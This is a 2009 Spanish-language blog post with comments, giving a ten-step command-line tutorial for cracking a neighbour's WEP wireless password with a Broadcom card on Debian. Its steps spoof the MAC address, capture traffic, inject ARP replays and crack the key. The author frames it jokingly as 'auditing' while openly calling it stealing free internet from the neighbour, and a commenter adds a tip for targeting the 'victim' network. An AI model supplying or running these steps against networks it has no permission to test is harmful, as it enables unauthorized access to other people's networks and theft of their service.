jueves, 28 de mayo de 2009

"Auditoria" Wireless con Broadcom en 10 pasos xD y 10 min xD

Bien por ke ustedes lo pidieron.. y priincipalmente porke se me olvida... xD he aki mi pekeño tuto para la "auditoria wireless", con la tarjeta inalambrica Broadcom 94311MCG que es la ke tiene mi laptop: Acer 9410z, esto con debian lenny, no voy a explicar aki la instalacion de los drivers.. xD pues ese no es el tema..

Bien aki vamos:

Bueno antes ke nada una buena rola:
Jose Amnesia Ft Jennifer Rene - louder(blake jarrell's 190db remix).mp3 Excelente Rola son cerca de 10:22 de otro world.. seee deleite para este tuto... ( see soy fan de jennifer...chikitaaaa yo si te pongo casaaa xD seee... cual es su pedo xD )

1.-Se verifica que la interfaz inalambrica este reconocida por el sistema con el comando:

iwconfig

2.- Cambiar la MAC adress de la tarjeta inalambrica para facilitar el robo xD:

macchanger -m 00:11:22:33:44:55 eth3

3.- Buscamos una victima... perdon una red a auditar xD:

airodump-ng eth3

4.-Iniciamos el archivo de Captura:

airodump-ng -w nombrecaptura -c 6 eth3 ( el parametro -c indica el canal a capturar )

5.-Abrimos otra terminal

6.-Asociamos la tarjeta de red inalambrica a la red del vecino xD:

aireplay-bcm-ng -1 0 -e BSSID_A_ROBAR -a xx:xx:xx:xx:xx -h 00:11:22:33:44:55 eth3

7.-Iniciamos la captura de paquetes del vecino:

aireplay-bcm-ng -3 -b xx:xx:xx:xx:xx -h 00:11:22:33:44:55 eth3

8.- Esperamos a qie se logren mas de 100,000 ARP`s ( prox 10 min ) para redes infinitum, o modems 2 wire, para routers linksys awanta que se capturen unos 900,000 o mas.. y funciona... me consta... xD

9.- Abrimos otra terminal y buscamos el archivo .cap para encontrar la contraseña con el comando:

aircrack-ptw nombrecaptura.cap

10.- LISTOO... jaja ya tenemos internet gratis.. am bueno este.. auditamos la red inalambrica del vecino...

Pd: No me hago responsable por el uso que se le de a esta informacion... pues es meramente educativa.. xD

En cuanto llegue a mi casa pongo las caps...

4 comentarios:

  1. -c puede ser --channel, te recomiendo que en el paso cuatro solo escuches a la victima digo a la persona que vas a auditar

    airodump-ng -bssid macdelavictima -w nombrecaptura -c 6 eth3

    Así no perderás mucho tiempo al usar tu ptw :D y tendrás que buscar una rola que tarde menos de 10 min xD saludos

    ResponderEliminar
  2. xD orale xD que XD chido xD me xD gusto xD tu xD artículo xD

    xD

    xD muy xD bueno xD

    xD

    xD saludos xD

    ResponderEliminar
  3. Gracias Bucio por el tip :)

    ResponderEliminar
  4. Que onda spike, buen tut para las bcm, aqui les dejo otro que hice yo para una linksys ( WUSB54GC ) y aircrack, espero les sirva

    LigaSaludos !!

    ResponderEliminar